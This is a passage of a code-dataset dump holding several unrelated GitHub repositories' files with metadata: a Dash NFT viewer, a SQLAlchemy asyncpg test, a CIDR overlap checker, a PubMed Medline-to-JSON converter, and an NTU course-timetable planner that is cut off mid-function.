],\n value=\"desc\",\n id=\"order-direction-input\",\n ),\n ],\n className=\"form-group\",\n ),\n html.Div(\n [\n dbc.Label(\"Page\"),\n html.Br(),\n dbc.Pagination(max_value=5, first_last=True, active_page=1, id=\"asset_pagination\",\n className=\"pagination\"),\n ]\n ),\n ]\n\n return html.Div(\n [\n html.Div(\n [\n dbc.Card([dbc.CardHeader(\"Filter\", className=\"card-header text-muted\"),\n dbc.CardBody([dbc.Row([dbc.Col(c) for c in controls])], className=\"card-body\")],\n body=True,\n className=\"card border-light mb-3\"), # create sorting controls\n ],\n className=\"header\",\n ),\n html.Div(id=\"card-grid-content\"),\n ],\n className=\"main\"\n )\n\n\[email protected](\n Output(\"card-grid-content\", \"children\"),\n [Input(\"collection-input\", \"value\"),\n Input(\"order-by-input\", \"value\"),\n Input(\"order-direction-input\", \"value\"),\n Input(\"asset_pagination\", \"active_page\")]\n)\ndef update_grid(collection, order_by, order_direction, page_no):\n \"\"\"\n Takes input and creates the grid based on choices or default values\n :param collection: collection name\n :param order_by: order of assets\n :param order_direction: asc/desc\n :param page_no: the current page number, for pagination/offset\n :return: card grid with data matching applied filter\n \"\"\"\n limit = 20\n page_no = page_no\n offset = (page_no * limit) - limit\n assets = get_assets(order_by, order_direction, offset, limit, collection)\n return create_cardgrid(assets)\n"
},
{
"alpha_fraction": 0.5109890103340149,
"alphanum_fraction": 0.7051281929016113,
"avg_line_length": 17.200000762939453,
"blob_id": "813d15a5d3d6cff64633926194c2553a4f92aaa2",
"content_id": "ab0aebf32e0ffd9bcc51f3ad5bcc9ebcb67b51cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 546,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 30,
"path": "/requirements.txt",
"repo_name": "KineBergseth/stacc-Kodekonkurranse-2021",
"src_encoding": "UTF-8",
"text": "Brotli==1.0.9\ncertifi==2021.5.30\ncharset-normalizer==2.0.6\nclick==8.0.1\ncolorama==0.4.4\ndash==2.0.0\ndash-bootstrap-components==1.0.0rc1\ndash-core-components==2.0.0\ndash-html-components==2.0.0\ndash-table==5.0.0\nFlask==2.0.2\nFlask-Compress==1.10.1\ngunicorn==20.1.0\nidna==3.2\nimportlib-metadata==4.8.1\nitsdangerous==2.0.1\nJinja2==3.0.2\nMarkupSafe==2.0.1\nnumpy==1.21.2\npandas==1.3.3\nplotly==5.3.1\npython-dateutil==2.8.2\npytz==2021.3\nrequests==2.26.0\nsix==1.16.0\ntenacity==8.0.1\ntyping-extensions==3.10.0.2\nurllib3==1.26.7\nWerkzeug==2.0.1\nzipp==3.6.0\n"
},
{
"alpha_fraction": 0.7488188743591309,
"alphanum_fraction": 0.7606298923492432,
"avg_line_length": 32.421051025390625,
"blob_id": "9d57584579e59f89b9f37ca5e4639d37c248c751",
"content_id": "af44b44be895dcb153e47fa663ff145ab6dd1ebb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1270,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 38,
"path": "/README.md",
"repo_name": "KineBergseth/stacc-Kodekonkurranse-2021",
"src_encoding": "UTF-8",
"text": "# Stacc - Kodekonkurranse 2021\n\nA app where you can view NFTs, put inn fake offers and upload your own NFTs (they do not get uploaded for real).\nThe asset cards have links in the name, that takes you to a page displaying a single asset.\n\nDisclaimer: the marketplace may be a bit wonky sometimes, if some links are broken the cards will be text only,\ntry refreshing or messing around with the filter to get assets with data available :)\n\nThe webapp can be viewed here: \nhttps://stacc-nft.herokuapp.com/\n\n## Getting started \nThe app is written in Python with Dash framework. The app is also available on heroku.\nIf you want to run it locally follow the steps below:\n\n### Prerequisites\n- Python 3.X \n- Internet connection\n\n### Setup\nStart by opening your preferred terminal, and navigate to this project's directory.\nTo be able to run the code, you need to install the required python modules.\nYou install the required libraries by writing the following in your terminal:\n\n```\npip install -r requirements.txt\n```\n\n#### Running the code\n```\npython index.py\n```\n\nThe Dash app should now be running on http://127.0.0.1:8050/, and you must open up that address in a browser of your choice.\n\n\nOpenSea API was used for the project:\nhttps://docs.opensea.io/reference/api-overview\n"
}
] | 12 |
woodmanwumeng/sqlalchemy
|
https://github.com/woodmanwumeng/sqlalchemy
|
759284fd129afe298ea281f1addcbce7eda7389e
|
038ee979985c5585287c5636bbfde607082f5130
|
7c930695be7e7ab4f10674701d018737c7954392
|
refs/heads/master
| 2023-02-12T19:07:59.358491 | 2021-01-15T04:01:13 | 2021-01-15T04:35:41 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4934675097465515,
"alphanum_fraction": 0.5061793923377991,
"avg_line_length": 30.120878219604492,
"blob_id": "09a24418e0d00fd9c82a24ebd4c7808f7985c42f",
"content_id": "f6d48f3c65b0a4360d594544f3af3d65f0e1db40",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5664,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 182,
"path": "/test/dialect/postgresql/test_async_pg_py3k.py",
"repo_name": "woodmanwumeng/sqlalchemy",
"src_encoding": "UTF-8",
"text": "import random\n\nfrom sqlalchemy import Column\nfrom sqlalchemy import exc\nfrom sqlalchemy import Integer\nfrom sqlalchemy import MetaData\nfrom sqlalchemy import String\nfrom sqlalchemy import Table\nfrom sqlalchemy import testing\nfrom sqlalchemy.dialects.postgresql import ENUM\nfrom sqlalchemy.ext.asyncio import create_async_engine\nfrom sqlalchemy.testing import async_test\nfrom sqlalchemy.testing import engines\nfrom sqlalchemy.testing import fixtures\n\n\nclass AsyncPgTest(fixtures.TestBase):\n __requires__ = (\"async_dialect\",)\n __only_on__ = \"postgresql+asyncpg\"\n\n @testing.fixture\n def async_engine(self):\n return create_async_engine(testing.db.url)\n\n @testing.fixture()\n def metadata(self):\n # TODO: remove when Iae6ab95938a7e92b6d42086aec534af27b5577d3\n # merges\n\n from sqlalchemy.testing import util as testing_util\n from sqlalchemy.sql import schema\n\n metadata = schema.MetaData()\n\n try:\n yield metadata\n finally:\n testing_util.drop_all_tables_from_metadata(metadata, testing.db)\n\n @async_test\n async def test_detect_stale_ddl_cache_raise_recover(\n self, metadata, async_engine\n ):\n async def async_setup(engine, strlen):\n metadata.clear()\n t1 = Table(\n \"t1\",\n metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"name\", String(strlen)),\n )\n\n # conn is an instance of AsyncConnection\n async with engine.begin() as conn:\n await conn.run_sync(metadata.drop_all)\n await conn.run_sync(metadata.create_all)\n await conn.execute(\n t1.insert(),\n [{\"name\": \"some name %d\" % i} for i in range(500)],\n )\n\n meta = MetaData()\n\n t1 = Table(\n \"t1\",\n meta,\n Column(\"id\", Integer, primary_key=True),\n Column(\"name\", String),\n )\n\n await async_setup(async_engine, 30)\n\n second_engine = engines.testing_engine(asyncio=True)\n\n async with second_engine.connect() as conn:\n result = await conn.execute(\n t1.select()\n .where(t1.c.name.like(\"some name%\"))\n .where(t1.c.id % 17 == 6)\n )\n\n rows = result.fetchall()\n assert len(rows) >= 29\n\n await async_setup(async_engine, 20)\n\n async with second_engine.connect() as conn:\n with testing.expect_raises_message(\n exc.NotSupportedError,\n r\"cached statement plan is invalid due to a database schema \"\n r\"or configuration change \\(SQLAlchemy asyncpg dialect \"\n r\"will now invalidate all prepared caches in response \"\n r\"to this exception\\)\",\n ):\n\n result = await conn.execute(\n t1.select()\n .where(t1.c.name.like(\"some name%\"))\n .where(t1.c.id % 17 == 6)\n )\n\n # works again\n async with second_engine.connect() as conn:\n result = await conn.execute(\n t1.select()\n .where(t1.c.name.like(\"some name%\"))\n .where(t1.c.id % 17 == 6)\n )\n\n rows = result.fetchall()\n assert len(rows) >= 29\n\n @async_test\n async def test_detect_stale_type_cache_raise_recover(\n self, metadata, async_engine\n ):\n async def async_setup(engine, enums):\n metadata = MetaData()\n Table(\n \"t1\",\n metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"name\", ENUM(*enums, name=\"my_enum\")),\n )\n\n # conn is an instance of AsyncConnection\n async with engine.begin() as conn:\n await conn.run_sync(metadata.drop_all)\n await conn.run_sync(metadata.create_all)\n\n t1 = Table(\n \"t1\",\n metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\n \"name\",\n ENUM(\n *(\"beans\", \"means\", \"keens\", \"faux\", \"beau\", \"flow\"),\n name=\"my_enum\"\n ),\n ),\n )\n\n await async_setup(async_engine, (\"beans\", \"means\", \"keens\"))\n\n second_engine = engines.testing_engine(\n asyncio=True,\n options={\"connect_args\": {\"prepared_statement_cache_size\": 0}},\n )\n\n async with second_engine.connect() as conn:\n await conn.execute(\n t1.insert(),\n [\n {\"name\": random.choice((\"beans\", \"means\", \"keens\"))}\n for i in range(10)\n ],\n )\n\n await async_setup(async_engine, (\"faux\", \"beau\", \"flow\"))\n\n async with second_engine.connect() as conn:\n with testing.expect_raises_message(\n exc.InternalError, \"cache lookup failed for type\"\n ):\n await conn.execute(\n t1.insert(),\n [\n {\"name\": random.choice((\"faux\", \"beau\", \"flow\"))}\n for i in range(10)\n ],\n )\n\n # works again\n async with second_engine.connect() as conn:\n await conn.execute(\n t1.insert(),\n [\n {\"name\": random.choice((\"faux\", \"beau\", \"flow\"))}\n for i in range(10)\n ],\n )\n"
}
] | 1 |
RasmusEduards/IP_tool
|
https://github.com/RasmusEduards/IP_tool
|
924140796b577ec4f3a16060992f071bf150145a
|
a268749d5e40e6408e748a11f2f1f2e03b0a2593
|
b1478336d9d6915b88e41bb22f68a8a4750de9fb
|
refs/heads/main
| 2023-04-17T14:04:58.701177 | 2021-05-04T08:21:38 | 2021-05-04T08:21:38 | 364,184,013 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6617100238800049,
"alphanum_fraction": 0.6988847851753235,
"avg_line_length": 18.14285659790039,
"blob_id": "e63e06403a4ca07aa1594fdeceaedffad4ecc6b1",
"content_id": "14e90bc65d30230cfc42453bb1a98a7097b1540a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 269,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 14,
"path": "/cidrcalc.py",
"repo_name": "RasmusEduards/IP_tool",
"src_encoding": "UTF-8",
"text": "import ipaddress\n\ncidr1 = input(\"Enter CIDR range 1: \")\n\ncidr2 = input(\"Enter CIDR range 2: \")\n\n\nn1 = ipaddress.ip_network(cidr1)\nn2 = ipaddress.ip_network(cidr2)\n\nif n1.overlaps(n2) == True:\n\tprint(\"CIDRs are overlapping!\")\nelse:\n\tprint(\"CIDRs are NOT overlapping!\")\n\n"
},
{
"alpha_fraction": 0.7837837934494019,
"alphanum_fraction": 0.7837837934494019,
"avg_line_length": 36,
"blob_id": "d0f06cf7af6a7360aa08b15110505147b6d44cac",
"content_id": "377243c2dfc4f0a1ea5a3f802737326aac348141",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 74,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 2,
"path": "/README.md",
"repo_name": "RasmusEduards/IP_tool",
"src_encoding": "UTF-8",
"text": "# IP_tool\nThis tool checks wheter two CIDR ranges are overlapping or not.\n"
}
] | 2 |
HustlerQian/Pubmed_MongoDB
|
https://github.com/HustlerQian/Pubmed_MongoDB
|
85c5b7187fcf821a92c26adf23bb9d161f2c935c
|
6ee13005229230a90eb71aa1adb633bec096299b
|
27941d279ab9734a892986f1b33381a8fd8294fb
|
refs/heads/master
| 2018-03-07T15:19:39.983838 | 2016-08-31T05:06:10 | 2016-08-31T05:06:10 | 64,978,194 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4830188751220703,
"alphanum_fraction": 0.4930817484855652,
"avg_line_length": 32.284481048583984,
"blob_id": "3efbbecdff267704b95d32eb81ebc291007b5b5c",
"content_id": "3dc621c995d7b9a7fe95687f1aa34ae18634ae06",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4027,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 116,
"path": "/Medline2Json.py",
"repo_name": "HustlerQian/Pubmed_MongoDB",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\r\n\r\nimport re,os,json \r\n\r\n#medline_path='..\\\\network_approach\\\\materials\\\\cas9_researchRe\\\\fromPUBMED_2015.1.22\\\\cas9_medline.txt'\r\n#out_dir='..\\\\network_approach\\\\literature\\\\abs\\\\'\r\n#path='..\\\\pubmed\\\\'\r\n#f=open(path,'r')\r\n#data=f.readlines()\r\n#f.close()\r\n#\r\ndef ToJson(path,TestJson):\r\n f=open(path,'r')\r\n data=f.readlines()\r\n #尾行加一行假的PMID-\r\n data.append('PMID- ')\r\n f.close()\r\n Medline={}\r\n pmid,ab,ab_start='','',0\r\n keyword,keyword_start='',0\r\n dateaccess,datepublish='',''\r\n fullauthor,fullauthor_start='',0\r\n publication_type,publication_status,language='','',''\r\n title,journal,journalabbreviation='','',''\r\n meshterm=''\r\n status=''\r\n for i in range(0,len(data)):\r\n line=data[i]\r\n if line.startswith('PMID- '):\r\n if len(ab)!=0 and pmid!='':\r\n Medline['Abstrat']=ab\r\n Medline['PmID']=pmid\r\n Medline['DateAccess']=dateaccess\r\n Medline['DatePublish']=datepublish\r\n Medline['FullAuthor']=fullauthor\r\n Medline['Title']=title\r\n Medline['Journal']=journal\r\n Medline['JournalAbbreviation']=journalabbreviation\r\n Medline['Keyword']=keyword\r\n Medline['MeshTerm']=meshterm\r\n Medline['PublicationType']=publication_type\r\n Medline['PublicationStatus']=publication_status\r\n Medline['Language']=language\r\n Medline['Status']=status\r\n TestJson.append(Medline)\r\n Medline={}\r\n pmid=line[6:].strip()\r\n ab,ab_start='',0\r\n keyword,keyword_start='',0\r\n dateaccess,datepublish='',''\r\n fullauthor=''\r\n publication_type,publication_status,language='','',''\r\n title,journal,journalabbreviation='','',''\r\n meshterm=''\r\n status=''\r\n #找到Abstract\r\n if line.startswith('AB - '):\r\n ab=line[6:].strip()\r\n ab_start=1\r\n else:\r\n if ab_start==1 and line.startswith(' '):\r\n ab+=' '+line.strip()\r\n if ab_start==1 and line[0]!=' ':\r\n ab_start=0\r\n #找到Keyword\r\n if line.startswith('OT -'):\r\n if keyword!='':\r\n keyword+='|'+line[6:].strip()\r\n else:\r\n keyword=line[6:].strip()\r\n #找到MeshTerm\r\n if line.startswith('MH -'):\r\n if meshterm!='':\r\n meshterm+='|'+line[6:].strip()\r\n else:\r\n meshterm=line[6:].strip() \r\n #找到FullAuthor \r\n if line.startswith('FAU -'):\r\n if fullauthor!='':\r\n fullauthor+='|'+line[6:].strip()\r\n else:\r\n fullauthor=line[6:].strip() \r\n if line.startswith('DA -'):\r\n dateaccess=line[6:].strip() \r\n if line.startswith('DP -'):\r\n datepublish=line[6:].strip() \r\n if line.startswith('TI -'):\r\n title=line[6:].strip()\r\n if line.startswith('JT -'):\r\n journal=line[6:].strip()\r\n if line.startswith('TA -'):\r\n journalabbreviation=line[6:].strip()\r\n if line.startswith('PT -'):\r\n publication_type=line[6:].strip()\r\n if line.startswith('PST -'):\r\n publication_status=line[6:].strip() \r\n if line.startswith('LA -'):\r\n language=line[6:].strip()\r\n if line.startswith('STAT-'):\r\n status=line[6:].strip()\r\n return TestJson\r\n\r\n \r\n\r\n\r\ndef main():\r\n open_path='.\\\\pubmed\\\\'\r\n #初始化Json,未来按年份输出\r\n TestJson=[]\r\n for root,dirs,filelists in os.walk(open_path):\r\n for file in filelists:\r\n path=os.path.join(root,file)\r\n TestJson=ToJson(path,TestJson)\r\n json.dump(TestJson,open('.\\\\TestJson.json','w'),indent=4)\r\nif __name__=='__main__':\r\n main()"
}
] | 1 |
koallen/ntu-course-planner-cli
|
https://github.com/koallen/ntu-course-planner-cli
|
da49bfd4ec0d0985bb11bef444d1f2e518a0a017
|
45af764daa1f7e4e42d21d8e8c9fe5f561e9e24a
|
50aeb3487a08fa2a35baac23552cab4e25ecec0c
|
refs/heads/master
| 2023-07-07T16:59:50.093904 | 2023-07-04T02:41:37 | 2023-07-04T02:41:37 | 27,982,499 | 8 | 9 |
MIT
| 2014-12-14T03:50:22 | 2023-02-13T10:25:16 | 2023-07-04T02:41:38 |
Python
|
[
{
"alpha_fraction": 0.6912751793861389,
"alphanum_fraction": 0.6912751793861389,
"avg_line_length": 20.285715103149414,
"blob_id": "e5ef74b38314ea730cc81dadbdc33fcba7333701",
"content_id": "934802ba6ff82331073dcc27698b254a4457110c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 149,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 7,
"path": "/Makefile",
"repo_name": "koallen/ntu-course-planner-cli",
"src_encoding": "UTF-8",
"text": ".PHONY: build upload\n\nbuild:\n\t. venv/bin/activate && rm -rf dist && python setup.py bdist_wheel\n\nupload:\n\t. venv/bin/activate && twine upload dist/*\n"
},
{
"alpha_fraction": 0.6333333253860474,
"alphanum_fraction": 0.6411111354827881,
"avg_line_length": 35,
"blob_id": "e48eab605dc58689f1724b9d2129dda13513f9b8",
"content_id": "7b7736c66b214aa18daf20efa8b7b6ee66e6c533",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 900,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 25,
"path": "/ntu_course_planner/ssl_type.py",
"repo_name": "koallen/ntu-course-planner-cli",
"src_encoding": "UTF-8",
"text": "\"\"\"\nCodes are from http://lukasa.co.uk/2013/01/Choosing_SSL_Version_In_Requests/\n\nIt is used to choose a SSL version manually so that I can successfully\nconnect to NTU server to fetch course schedule data.\n\nThanks for Lukasa's work :)\n\"\"\"\n\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.poolmanager import PoolManager\n\nclass SSLAdapter(HTTPAdapter):\n \"\"\"An HTTPS Transport Adapter that uses an arbitrary SSL version.\"\"\"\n\n def __init__(self, ssl_version=None, **kwargs):\n self.ssl_version = ssl_version\n\n super(SSLAdapter, self).__init__(**kwargs)\n\n def init_poolmanager(self, connections, maxsize, block=False):\n self.poolmanager = PoolManager(num_pools=connections,\n maxsize=maxsize,\n block=block,\n ssl_version=self.ssl_version)\n"
},
{
"alpha_fraction": 0.6487069129943848,
"alphanum_fraction": 0.6530172228813171,
"avg_line_length": 36.621620178222656,
"blob_id": "7a92f370cec0114ede7d028a9c0424aebe08c4da",
"content_id": "464e5355172417e102a760986ceff6f94a9f815d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1392,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 37,
"path": "/setup.py",
"repo_name": "koallen/ntu-course-planner-cli",
"src_encoding": "UTF-8",
"text": "from setuptools import setup\n\nlong_description = \"\"\"\nThis is a tool for Nanyang Technological University students to plan their timetable.\nAfter you supply with the tool the courses that you intent to take in a semester, it\ncan automatically generate all the possible combinations of indexes for the courses\nthat you picked. It's guaranteed that there will be no timetable clash.\n\"\"\"\n\nsetup(\n name = \"ntu-course-planner\",\n version = \"1.0.3\",\n description = \"A course planner for Nanyang Technological University students\",\n long_description = long_description,\n url = \"https://github.com/koallen/ntu-course-planner-cli\",\n author = \"Liu Siyuan\",\n author_email = \"[email protected]\",\n license = \"MIT\",\n classifiers = [\n \"Development Status :: 5 - Production/Stable\",\n \"Environment :: Console\",\n \"Intended Audience :: End Users/Desktop\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Natural Language :: English\",\n \"Programming Language :: Python :: 3 :: Only\",\n \"Topic :: Utilities\"\n ],\n keywords = [\"course\", \"planner\", \"Nanyang Technological University\"],\n packages = [\"ntu_course_planner\"],\n install_requires = ['requests', 'beautifulsoup4'],\n entry_points = {\n \"console_scripts\": [\n 'ntu-course-planner = ntu_course_planner.main:main'\n ]\n }\n)\n"
},
{
"alpha_fraction": 0.5384615659713745,
"alphanum_fraction": 0.7435897588729858,
"avg_line_length": 18.5,
"blob_id": "c25b393a41fde08bf9ff3b2cfd594c989279b9a7",
"content_id": "8bde1ee95b51634d723901d2439a56dd249d7451",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 39,
"license_type": "permissive",
"max_line_length": 21,
"num_lines": 2,
"path": "/requirements.txt",
"repo_name": "koallen/ntu-course-planner-cli",
"src_encoding": "UTF-8",
"text": "requests==2.31.0\nbeautifulsoup4==4.3.2\n"
},
{
"alpha_fraction": 0.7444933652877808,
"alphanum_fraction": 0.757709264755249,
"avg_line_length": 36.83333206176758,
"blob_id": "70847746e09bb84a6e5102934290d71d04ac0a8e",
"content_id": "27bc9c8bead90e7d53f436f9640cc9076fc7bb68",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 227,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 6,
"path": "/ntu_course_planner/__init__.py",
"repo_name": "koallen/ntu-course-planner-cli",
"src_encoding": "UTF-8",
"text": "import requests\nfrom . import config\n\nr = requests.get(\"https://raw.githubusercontent.com/koallen/ntu-course-planner-cli/master/LATEST\")\nlatest_version = r.text.rstrip(\"\\n\")\nconfig.init(latest_version[0:4], latest_version[-1])\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.7629449963569641,
"avg_line_length": 32.4054069519043,
"blob_id": "a3cd3aefbe09db2ebe343a32c821a52099023fb5",
"content_id": "7e3891ca5bca3cfdbe8866da0a0c50b766749c01",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1236,
"license_type": "permissive",
"max_line_length": 188,
"num_lines": 37,
"path": "/README.md",
"repo_name": "koallen/ntu-course-planner-cli",
"src_encoding": "UTF-8",
"text": "# NTU Course Planner\n\n> A Python program for NTU students to plan courses.\n\n## Newest Course Schedule Updates\n\nUpdated for academic year 2018-19 semester 2 (*30/11/2018*)\n\n## Installation\n\nTo use this program, just install the package via `pip` by typing the following command in your terminal\n```bash\n$ pip install ntu-course-planner\n```\n\n## Usage\n\nAfter you installed the package, run the program by typing the following in your terminal\n```bash\n$ ntu-course-planner\n```\n\nYou are required to type in the number of courses you are taking and the course codes. Then the planner will plan your timetable.\n\nThe result which has all the possible combination of indexes is saved as a text file called **result.txt**. The file is inside the folder which you run the command.\n\n## Development Dependencies\n\n* requests\n* beautifulsoup4\n\nIf you know how to use *requirements.txt*, you can use that to help you install these dependencies.\n\n## Contribution\nIf you would like to contribute to this project, please contact me via the email in my profile page. Here are some improvements that I would like to implement in the future if I have time:\n- ~~Make it a Python package~~ (done)\n- Develop a front-end website as well as a back-end API for it\n"
},
{
"alpha_fraction": 0.6823529601097107,
"alphanum_fraction": 0.6823529601097107,
"avg_line_length": 20.25,
"blob_id": "46c6ebaeafff79cd4ac08efd163e5f47f0fc17fc",
"content_id": "48b77a442d1b58d34a2a3d4a451b3afde8e5c082",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 170,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 8,
"path": "/ntu_course_planner/main.py",
"repo_name": "koallen/ntu-course-planner-cli",
"src_encoding": "UTF-8",
"text": "from .planner import Planner\nfrom . import config\n\nimport requests\n\ndef main():\n print(\"Planning for \" + config.ACADYEAR + \"/\" + config.ACADSEM)\n Planner().start()\n"
},
{
"alpha_fraction": 0.5478223562240601,
"alphanum_fraction": 0.5606319308280945,
"avg_line_length": 34.7557258605957,
"blob_id": "5becf3e176a2b98d0b70ba8de643379d50897826",
"content_id": "b201546a04d48a0f331f0626607392fda207a0a7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4684,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 131,
"path": "/ntu_course_planner/course.py",
"repo_name": "koallen/ntu-course-planner-cli",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport ssl\n\nfrom .ssl_type import SSLAdapter\nfrom . import config\n\n\nclass Course:\n\n\n def __init__(self, courseCode):\n self.__courseCode = courseCode\n self.__courseSchedule = CourseSchedule()\n\n def get_course_schedule(self):\n \"\"\"get the dictionary of the schedule\"\"\"\n\n return self.__courseSchedule.get_schedule()\n\n def get_course_code(self):\n \"\"\"get the course code\"\"\"\n\n return self.__courseCode\n\n def fetch_schedule(self):\n \"\"\"fetch schedule of the course\"\"\"\n\n self.__courseSchedule.parse_schedule(self.__courseCode)\n\n\nclass CourseSchedule:\n \"\"\"class that contains schedule of a course\"\"\"\n\n INDEX_OF_DAY = {'MON': 0, 'TUE': 24, 'WED': 48, 'THU': 72, 'FRI': 96}\n\n def get_schedule(self):\n return self.__schedule\n\n def parse_schedule(self, courseCode):\n \"\"\"parse the course schedule and convert it to a binary string\"\"\"\n\n self.__schedule = {}\n\n # get html table format of course schedule\n print(\"Getting schedule for \" + courseCode.upper() + \"...\", end=\" \")\n schedule = self.__fetch_schedule(courseCode)\n print(\"Done\")\n\n # convert the course schedule to a binary string\n #\n # it is a 120 bit string and every bit represents half an hour\n # bit 1 means that there is a class at that time\n # bit 0 means there is none\n #\n # for each day the time is from 8:30 am to 8:30 am\n # this should be able to cover the schedule of most of the\n # courses in NTU\n for i in range(len(schedule) // 7):\n for j in range(7):\n string = str(schedule[i * 7 + j])\n string = string[7:len(string) - 9]\n if j == 0 and string != \"\": # get the index of the course\n currentIndex = string\n self.__schedule[currentIndex] = \"0\" * 120\n elif j == 3: # get the days that have this course\n indexOfDay = CourseSchedule.INDEX_OF_DAY[string]\n elif j == 4: # get the time of that course in a day\n numOfTimeSlots = self.__get_time(string)\n indexOfTime = (int(string[:4]) - 830) // 50\n # if j reaches 6, prasing is done\n # the following code is to modify the binary string\n # according to the parsing result\n elif j == 6:\n startingIndex = indexOfDay + indexOfTime\n endingIndex = startingIndex + numOfTimeSlots\n self.__schedule[currentIndex] = \\\n self.__schedule[currentIndex][:startingIndex] + \\\n \"1\" * numOfTimeSlots + \\\n self.__schedule[currentIndex][endingIndex:]\n else:\n pass\n\n def __fetch_schedule(self, courseCode):\n \"\"\"fetch course schedule using course code from NTU website\"\"\"\n\n # generate URL for the course\n url = \\\n \"https://wish.wis.ntu.edu.sg/webexe/owa/AUS_SCHEDULE\" + \\\n \".main_display1?acadsem=\" + config.ACADYEAR + \";\" + config.ACADSEM + \\\n \"&r_search_type=F&r_subj_code=\" + courseCode + \\\n \"&boption=Search&staff_access=false&acadsem=\" + config.ACADYEAR + \\\n \";\" + config.ACADSEM + \"&r_course_yr=\"\n\n # try connecting to the server\n try:\n s = requests.Session()\n s.mount(\"https://\", SSLAdapter(ssl.PROTOCOL_TLSv1))\n r = s.post(url)\n # exit program if server is not reachable\n except requests.exceptions.ConnectionError:\n print(\"Connection error. Cannot connect to NTU server.\")\n print(\"Please try to run this script again.\")\n exit(-1)\n\n # create BeautifulSoup object for later parsing\n soup = BeautifulSoup(r.text, features=\"html.parser\")\n\n # save the table which contains the course schedule\n try:\n schedule = soup.find_all(\"table\")[1].find_all(\"td\")\n except IndexError:\n print(\"\\nThe course code does not exist in NTU database\" +\n \"for this semester.\")\n print(\"Please make sure you entered a valid course code.\")\n exit(-1)\n schedule = schedule[:]\n\n return schedule\n\n def __get_time(self, timeString):\n \"\"\"convert the time format '0830-0930'\n to number of bits in the binary string\n \"\"\"\n\n timeInterval = int(timeString[5:]) - int(timeString[:4])\n numOfTimeSlots = timeInterval // 50\n\n return numOfTimeSlots\n"
},
{
"alpha_fraction": 0.5158549547195435,
"alphanum_fraction": 0.5226824283599854,
"avg_line_length": 29.794391632080078,
"blob_id": "8f9c03bc4b9d8813811882d622ffab00088f8517",
"content_id": "b506ce43d163de294b04f18e825d85345e124b52",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6591,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 214,
"path": "/ntu_course_planner/planner.py",
"repo_name": "koallen/ntu-course-planner-cli",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nPlanner that plans the timetable\n\"\"\"\n\nfrom itertools import product\nfrom .course import Course\nimport re\n\n\nclass Planner:\n \"\"\"planner handles the planning of timetable\"\"\"\n\n def plan(self, course_list, output_file=None):\n \"\"\"\n Execute the planner\n\n parameters:\n course_list: A list of courses\n output_file: The file to save the result to\n \"\"\"\n\n # course code validation\n if not self.validate(course_list):\n return {'error': 'invalid course code'}\n\n # save courses\n self.__courses = []\n for course_code in course_list:\n self.__courses.append(Course(course_code))\n\n # fetch schedule\n self.__fetch_schedule()\n\n # generate permutations and test them\n courseAndIndex = []\n for course in self.__courses:\n courseAndIndex.append(\n [i for i in range(len(course.get_course_schedule()))]\n )\n\n combinations = list(product(*courseAndIndex))\n self.__test_all_combinations(combinations)\n\n # output results\n if output_file is not None:\n pass\n\n result = []\n\n for combination in self.__result:\n single_result = []\n for i in range(len(combination)):\n single_dict = {}\n single_dict['course code'] = self.__courses[i].get_course_code().upper()\n single_dict['index'] = self.__bufferList[i][combination[i]]\n single_result.append(single_dict)\n result.append(single_result)\n\n return result\n\n\n def validate(self, course_list):\n \"\"\"\n Validates the course code\n\n parameters:\n course_list: A list of courses\n \"\"\"\n\n pattern = r\"^\\w{2}\\d{4}$\" # course code regex pattern\n\n # validate every course code\n for course in course_list:\n if not re.search(pattern, course):\n return False\n return True\n\n def start(self):\n \"\"\"start the planner\"\"\"\n\n # get courses and fetch their schedule first\n 